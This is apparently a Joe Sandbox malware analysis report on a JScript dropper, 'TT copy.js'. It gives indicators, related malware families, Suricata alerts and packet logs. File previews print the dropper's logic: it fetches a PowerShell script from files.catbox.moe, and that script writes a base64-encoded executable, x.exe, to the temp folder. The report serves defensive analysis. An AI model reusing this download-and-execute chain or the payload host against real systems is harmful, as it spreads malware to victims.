https://files.catbox.moe	wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.181.20.35	files.catbox.moe	Canada		852	ASN852CA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578023
Start date and time:	2024-12-19 07:49:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TT copy.js
Detection:	MAL
Classification:	mal100.troj.expl.evad.winJS@8/7@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 29 Number of non-executed functions: 226
Cookbook Comments:	Found application associated with file extension: .js Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6896 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:50:06	API Interceptor	8x Sleep call for process: powershell.exe modified
01:50:10	API Interceptor	28x Sleep call for process: x.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.181.20.35	Document.pdf.lnk	Get hash	malicious	Unknown	Browse	files.catbox.moe/p1yr9i.pdf
108.181.20.35	SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msi	Get hash	malicious	LummaC Stealer	Browse	files.catbox.moe/nzct1p

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
files.catbox.moe	z68scancopy.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	2zirzlMVqX.bat	Get hash	malicious	Xmrig	Browse	108.181.20.35
	QwLii5vouB.exe	Get hash	malicious	Unknown	Browse	108.181.20.35
	PO Huaruicarbon 98718.html	Get hash	malicious	CorporateDataTheft, HTMLPhisher	Browse	108.181.20.35
	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9	Get hash	malicious	Unknown	Browse	108.181.20.35
	LETA_pdf.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN852CA	alyemenione.lnk	Get hash	malicious	Havoc, Quasar	Browse	108.181.61.49
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	204.191.146.80
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	161.184.58.16
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	199.175.174.49
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	207.6.190.148
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	173.182.147.38
	arm5.nn-20241218-1651.elf	Get hash	malicious	Mirai, Okiru	Browse	172.218.204.155
	z68scancopy.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	207.34.214.194
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	142.101.249.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS	Browse	108.181.20.35
	Rapporteer inbreuk op auteursrechten.lnk.d.lnk	Get hash	malicious	Unknown	Browse	108.181.20.35
	File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk	Get hash	malicious	Unknown	Browse	108.181.20.35
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	108.181.20.35
	alyemenione.lnk	Get hash	malicious	Havoc, Quasar	Browse	108.181.20.35
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	108.181.20.35
	Payment_Failure_Notice_Office365_sdf_[13019].html	Get hash	malicious	HTMLPhisher	Browse	108.181.20.35
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	108.181.20.35
	List of required items and services.pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	108.181.20.35
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	108.181.20.35
37f463bf4616ecd445d4a1937da06e19	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	108.181.20.35
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	108.181.20.35
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	108.181.20.35
	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	108.181.20.35
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse	108.181.20.35
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	108.181.20.35
	solara-executor.exe	Get hash	malicious	Unknown	Browse	108.181.20.35
	List of required items and services.pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	108.181.20.35
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	108.181.20.35
	solara-executor.exe	Get hash	malicious	Unknown	Browse	108.181.20.35

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (14396), with CRLF line terminators
Category:	dropped
Size (bytes):	14456
Entropy (8bit):	4.634199447337688
Encrypted:	false
SSDEEP:	384:DFBJ8AV7nf9pZRbd7r32YLSq6AuzdQqWXGeS1WrA:RB9bd7rmYLSqKzdNeOWrA
MD5:	392DF965799760669862A1B77A8082A1
SHA1:	BFE92C51305517B11131E57055D3D6925642CD50
SHA-256:	F91B5AA1ACA053633FA2CEA131A71D337C952BCBDE82003975C8015EEC1CEBDD
SHA-512:	4D0129043581BB98BF266FF62D5D33D44020C7821317646B55050869658E8BA629BCD2758C256DD167017C246BCD0C2398A337DD2D400D2B135C703406C6EE43
Malicious:	true
Reputation:	low
Preview:	$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAQjhdcAAAAAAAAAAOAALgELAQYAACAAAAAIAAAAAAAADj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMA+AABLAAAAAEAAAJgFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4PgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADwPgAAAAAAAEgAAAACAAUAUCkAAHAUAAADAAIAEAAABsA9AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYrAiYWKwImFgIoBQAABgAAKgAAEzADANYAAAABAAARKwImFiAAAAAAOGcAAAAHgAEAAAQgBQAAADhXAAAAAH4BAAAEFP4BCigGAAAGKAcAAAY6a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	944
Entropy (8bit):	5.351116490279513
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kzer84j:MxHKlYHKh3oPtHo6hAHKzervj
MD5:	A4AD9642B1D9E75F65BCFF0E383D274F
SHA1:	6FFB77BAB80023486A6B72A108E8B1280104649E
SHA-256:	E96412EECCA9FB8FAC8C09170223DAD3F52A98A52EECF462BC4F3E2720251027
SHA-512:	743302453D5AF5301B9AD953E111EBED2F61AB0CF2159CEEF80279A48377F08C276CE5B33CBE1441667C72B42440B9B03FC3DDA1B9A274B977876978CC39FB92
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ugok5m[1].ps1

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (14396), with CRLF line terminators
Category:	dropped
Size (bytes):	14456
Entropy (8bit):	4.634199447337688
Encrypted:	false
SSDEEP:	384:DFBJ8AV7nf9pZRbd7r32YLSq6AuzdQqWXGeS1WrA:RB9bd7rmYLSqKzdNeOWrA
MD5:	392DF965799760669862A1B77A8082A1
SHA1:	BFE92C51305517B11131E57055D3D6925642CD50
SHA-256:	F91B5AA1ACA053633FA2CEA131A71D337C952BCBDE82003975C8015EEC1CEBDD
SHA-512:	4D0129043581BB98BF266FF62D5D33D44020C7821317646B55050869658E8BA629BCD2758C256DD167017C246BCD0C2398A337DD2D400D2B135C703406C6EE43
Malicious:	false
Reputation:	low
Preview:	$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAQjhdcAAAAAAAAAAOAALgELAQYAACAAAAAIAAAAAAAADj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMA+AABLAAAAAEAAAJgFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4PgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADwPgAAAAAAAEgAAAACAAUAUCkAAHAUAAADAAIAEAAABsA9AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYrAiYWKwImFgIoBQAABgAAKgAAEzADANYAAAABAAARKwImFiAAAAAAOGcAAAAHgAEAAAQgBQAAADhXAAAAAH4BAAAEFP4BCigGAAAGKAcAAAY6a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyprmqbk.i4p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0s3myqa.2zz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	5.086020476087015
Encrypted:	false
SSDEEP:	192:uYD1w0RZsWzLQR0zScCcRnh6fsVNgJSBsAZ:ND1lWALQsSl4h6fagOsA
MD5:	DF1F48D5D5C174AA6AB5910BB41064FB
SHA1:	653B29D4C76B935853D87AC6549B264E66D2127E
SHA-256:	86BAD2C3F962EC96995C26FFA50B93564C40BA23FED010078B740B8F8823CD83
SHA-512:	92335CDC575ECEEA32E38F8DCAE7CAF305B7DF69157505CEB6D927C41428452E097EF6AE413662ADB8908DC4EB6A67175F3C0DBEE04BB559EA1DA97B05D80A27
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#................... ...........?... ...@....@.. ....................................`..................................>..K....@.......................`......x>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P)..p............=..............................................F+.&.+.&..(.........0..........+.&. ....8g......... ....8W....~........(....(....:h...& ....(....:....&.r...p.....(....o....s.....82... ............E............t...........".......5...8o...& ....8.....9.... .....9....&.~..... .....:....&8........0..........+.&..~.....8.......2+.&...........:+.&.....(......+.&....+.&...>+.&......(.....0..........+.&..~.....8.......B+.&.+.&..(........v+.&.+.&.s..

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	4.978953383350334
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	TT copy.js
File size:	2'028 bytes
MD5:	24b70c6f9b34265023f8b4e9ceb4ae2e
SHA1:	94e435325199616348f67aa17f0209b90d4d6b18
SHA256:	6f1bdd6bc9a18a5ac6d7c28323e18f8aae4c5db0a5b54cc72df547518e7386c8
SHA512:	bb120bc79aecda57dcb774e353cbbbdb316af756040074e68bd9df619aadb2b47f717de53fc76856b5f6857ea9afc138eac2503509ef41e19c0db059cc3c4475
SSDEEP:	48:Rui8qYFJ6E3VwYJWgZdr6b0qu1/tcKVtvDb8r7:Rui8BzYgZx64Xwn
TLSH:	1141DD5D9C1AD3211937970E831FD148EE91816B5A10C221B99CCA46BF345ACCEB4BDF
File Content Preview:	// Constants to avoid magic strings..var URL = "https://files.catbox.moe/ugok5m.ps1";..var DownloadPath = "C:\\Temp\\dddddd.ps1";..var TEMP_DIR = "C:\\Temp";..var SUCCESS_STATUS = 200;....// Secure PowerShell execution policy and command..var POWERSHELL_C

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T07:50:05.500940+0100	2827578	ETPRO MALWARE Likely Dropper Doc GET to .moe TLD	1	192.168.2.4	49730	108.181.20.35	443	TCP
2024-12-19T07:50:05.501534+0100	2018856	ET MALWARE Windows executable base64 encoded	1	108.181.20.35	443	192.168.2.4	49730	TCP
2024-12-19T07:50:13.921848+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	108.181.20.35	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 07:50:03.203561068 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:03.203607082 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:03.203794003 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:03.214648008 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:03.214729071 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:04.964451075 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:04.964607000 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.077966928 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.078052044 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.079019070 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.079097986 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.081320047 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.123361111 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.500992060 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.501060963 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.501122952 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.501123905 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.501197100 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.501247883 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:05.501261950 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.501262903 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.501262903 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.501307011 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.509473085 CET	49730	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:05.509519100 CET	443	49730	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:08.159341097 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:08.159383059 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:08.159468889 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:08.167692900 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:08.167710066 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:09.915307999 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:09.915385962 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:09.917479038 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:09.917495966 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:09.917980909 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:09.967036963 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.030713081 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.075328112 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644722939 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644750118 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644757032 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644767046 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644809008 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.644826889 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644881964 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.644938946 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.690639973 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.690663099 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.690748930 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.690762997 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.690886021 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.837387085 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.837405920 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.837485075 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.837501049 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.837717056 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.879992008 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.880007982 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.880112886 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.880122900 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.880171061 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.909105062 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.909118891 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.909197092 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.909204960 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.909301043 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.933444023 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.933459997 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.933545113 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:10.933552980 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:10.933626890 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.038304090 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.038322926 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.038470984 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.038482904 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.038688898 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.062561035 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.062576056 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.062650919 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.062660933 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.062679052 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.062764883 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.083400965 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.083420038 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.083508015 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.083508015 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.083523989 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.083619118 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.097712994 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.097729921 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.097826004 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.097832918 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.097889900 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.110466957 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.110482931 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.110567093 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.110567093 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.110575914 CET	443	49731	108.181.20.35	192.168.2.4
Dec 19, 2024 07:50:11.110877037 CET	49731	443	192.168.2.4	108.181.20.35
Dec 19, 2024 07:50:11.122284889 CET	443	49731	108.181.20.35	192.168.2.4
